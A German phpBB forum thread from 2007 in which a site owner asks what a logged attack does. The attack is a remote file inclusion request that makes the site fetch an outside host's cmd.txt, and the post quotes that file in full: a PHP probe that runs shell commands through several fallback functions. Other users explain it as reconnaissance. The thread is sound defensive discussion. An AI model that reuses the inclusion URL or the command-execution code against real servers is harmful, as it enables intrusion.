Hack versuch!

Nordin · Beitrag von **Nordin** » 14.06.2007 12:33

Hallo Leute,

ich habe hab meinen CTXtra zu testzwecken auf www.soziales-forum.de installiert, da dort mega viel spam ankommt...

(wer mal reinschauen möchte: link: www.soziales-forum.de/portal/ctracker benutzer:Admin password:Admindummy - hab alle löschen/speichern/ändern - butten entfernt)

jedenfalls wurde heute folgender Angriff geloggt:

/portal/mycookies.php/includes/functions.php?phpbb_root_path=http://lifechangerscc.com//catalog/includes/cmd.txt?

IP: 212.69.210.203

dort findet man dann:

Code: Alles auswählen

<?
$dir = @getcwd();
echo "Mic22<br>";
$OS = @PHP_OS;
echo "OSTYPE:$OS<br>";
$free = disk_free_space($dir); 

if ($free === FALSE) {$free = 0;} 

if ($free < 0) {$free = 0;} 
echo "Free:".view_size($free)."<br>"; 

$cmd="id";
$eseguicmd=ex($cmd);
echo $eseguicmd;

function ex($cfe){
$res = '';
if (!empty($cfe)){
if(function_exists('exec')){
@exec($cfe,$res);
$res = join("\n",$res);
}
elseif(function_exists('shell_exec')){
$res = @shell_exec($cfe);
}
elseif(function_exists('system')){
@ob_start();
@system($cfe);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(function_exists('passthru')){
@ob_start();
@passthru($cfe);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(@is_resource($f = @popen($cfe,"r"))){
$res = "";
while(!@feof($f)) { $res .= @fread($f,1024); }
@pclose($f);
}}
return $res;
}

function view_size($size) 

{ 

if (!is_numeric($size)) {return FALSE;} 

else 

{ 

if ($size >= 1073741824) {$size = round($size/1073741824*100)/100 ." GB";} 

elseif ($size >= 1048576) {$size = round($size/1048576*100)/100 ." MB";} 

elseif ($size >= 1024) {$size = round($size/1024*100)/100 ." KB";} 

else {$size = $size . " B";} 

return $size; 

}} 

exit;

Was wollte er mit diesem code bezwecken???

SZOMM · Beitrag von **SZOMM** » 14.06.2007 13:24

Hallo Nordin,

reinschauen is ja wohl nich' ...

Ist das denn überhaupt ein phpBB - Forum ?

Alles Gute
Pèdà
*end*

Nordin · Beitrag von **Nordin** » 14.06.2007 14:28

Ist das denn überhaupt ein phpBB - Forum ?

Sorry aber lesen kannst du oder? Unten im Footer steht "powered by phpBB" *kopfschüttel* sonst würde ich hier ja nicht fragen...

Das ganze dingen ist ein Integramod... basierend auf phpBB... soweit ich weiß war das version phpBB2 oder so...

SZOMM · Beitrag von **SZOMM** » 14.06.2007 15:49

Eine persönliche Anrede hältst du ja für unnötig, OK ich mach mit ...
Meine Lesekenntnisse haben zumindest für über 1000 Bücher gereicht ...
Deine Seite wurde von einem Spieleportal oder etwas ähnlichem überlagert
die darüberhinaus sehr langsam geladen hat ...
Na egal, is' ja deine Seite

Empfehle dir dennoch, trotz deiner leicht überheblichen Art, einige der für
phpbb erhältlichen SicherheitsMOD's zu installieren, z. B:
Advanced_Visual_Confirmation
IP_Tracker v2.2.2
advanced_ip_tools_pack
Manage_Guest_Permissions
Secure_First_Admin
ggf. den CrackerTracker v5
LINK-Liste von mgutt

Mit Bestem Wunsch für deine Persönlichkeitsentwicklung
Pèdà
*end*

Nordin · Beitrag von **Nordin** » 14.06.2007 16:05

Hallo SZOMM,

also meine is nur noch dazu da SPAM zu sammeln... (kein Scherz)

Ich will nichts installieren oder irgendwas anderes... ich wollte nur wissen was der jenige mit dem Code bezwecken will bzw. wollte??

Nich mehr und nicht weniger. ..

SZOMM · Beitrag von **SZOMM** » 14.06.2007 18:40

Hallo Nordin,

.....
Zitat:
/portal/mycookies.php/includes/functions.php?phpbb_root_path=http://lifechangerscc.com//catalog/includes/cmd.txt?
IP: 212.69.210.203
-> Das scheint der Verursacher zu sein <-
dort findet man dann:
Code:
<?
$dir = @getcwd();
-> Hier wird was?(Webspace/Festplatte) ermittelt (1)<-
echo "Mic22<br>";
$OS = @PHP_OS; -> Betriebssystem-Ermittlung <-
echo "OSTYPE:$OS<br>";
$free = disk_free_space($dir);
-> Hier wird die Größe von (1) ermittelt <-

... Gekürzt aus Zeitmangel ... Sorry !
Muß was dringendes erledigen, vieleicht später mehr

Was wollte er mit diesem code bezwecken???

Garantiert nichts Gutes !

Alles Gute für dich
Pèdà
*end*

Nordin · Beitrag von **Nordin** » 14.06.2007 18:53

-> Das scheint der Verursacher zu sein <-
dort findet man dann:
Code:

Ja das is mir klar daher hab ich den code ja...

und das er nichts gutes wollte kann ich mir auch denken... phpBB is nich mein gebiet... ehr SMF von daher frag ich hier nach ob jemand was aus dem code rauslesen was er mit diesem code bezwecken wollte.

Beitrag von **Jan500** » 14.06.2007 19:08

so wie ich das sehe, gibt das script nur den freien space aus und dann noch die user und group id des jeweiligen users, der sich angemeldet hat (also den apache user)

aber keine sorge...
1. funktioniert die phpbb_root_path methode beim 2.0.22 nicht
2. haben meisten server shell_exec nicht erlaubt bzw nur eingeschränkt
3. wenn würde er nicht wirklich viel mit dem ergebniss anfangen können (so wie ich das sehe)

Jan

Beitrag von **Pyramide** » 14.06.2007 19:31

Warscheinlich ist das erstmal nur ein Testlauf, um zu sehen ob der Server überhaupt für "richtige" Angriffe verwundbar ist.

Nordin · Beitrag von **Nordin** » 14.06.2007 19:35

ahh ok das is doch mal ne aussage... ich werd das mal weiter beobachten... vom mir aus kann der da machen was er will das board is eh "down" von daher würd ich mich soagar freuen das er es irgedwie schaft da was zu machen... so kann ich die lücke dann mit in den CTracker einbauen kann...

phpBB.de

Hack versuch!

Hack versuch!

PS

PS

PS...